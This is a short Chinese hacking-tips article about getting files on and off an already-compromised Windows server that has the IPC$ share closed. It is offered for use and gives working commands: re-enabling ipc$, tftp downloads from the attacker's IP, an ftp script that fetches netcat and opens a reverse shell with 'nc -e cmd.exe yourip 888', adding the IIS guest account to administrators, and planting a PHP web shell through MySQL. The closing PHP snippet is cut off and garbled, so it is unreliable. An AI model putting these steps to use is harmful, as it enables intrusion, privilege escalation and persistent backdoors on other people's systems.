没开IPC$主机上传下载思路
发布时间:2019-11-26 00:22:25 所属栏目:趣闻 来源:本站整理
导读:,没开IPC$主机上传下载思路
|
比如用溢出攻击得到权限 发现没有开139 or 445 我们可以从内部make it崩溃: 1.net share ipc$ 例如,使用webdav溢出得到system net share 看一下 没有任何东西 用什么东西都连不上 所以 要先打开ipc$——net share ipc$ 剩下的你愿意使用什么就可以了,比如dameware. 2.tftp.exe 获得sa空口令,使用sqlexec链接,只开了80和1433怎么办?别忘了,你是在内部控制他,防火墙是可以从内部突破的。 打开本地的tftp server 然后在sqlexec中输入 tftp -i yourip get files 就可以了。 3.ftp 脚本 + nc 比如从80端口溢出后可以,写一个ftp的脚本然后用ftp -s ftp.txt从你的ftp下载nc。在溢出的命令提示符下使用nc nc -e c:winntsystem32cmd.exe yourip 888 在本地命令提示符下 nc -l -p 888 -vv 4.iusr_xx 高权限的cmd.asp 有运气的成分,80端口溢出,net localgroup administrators iusr_computername /add 用echo 写一个cmd.asp…… 5.使用mysql写的cmd.php 我转再过一篇文章 再贴一次 通过mysql入侵 1、在默认的mysql数据库中生成一个叫tmp的表,只有一个字段名,叫cmd,数据类型为text(可以不分大 小写) use mysql create table tmp(cmd text) 2、在tmp表cmd字段中写入一段php代码(注意这个文件导出后一定要叫cmd2.php) insert into tmp values(<|> temp.dat");}?> action="/cmd2.php"> ">
|
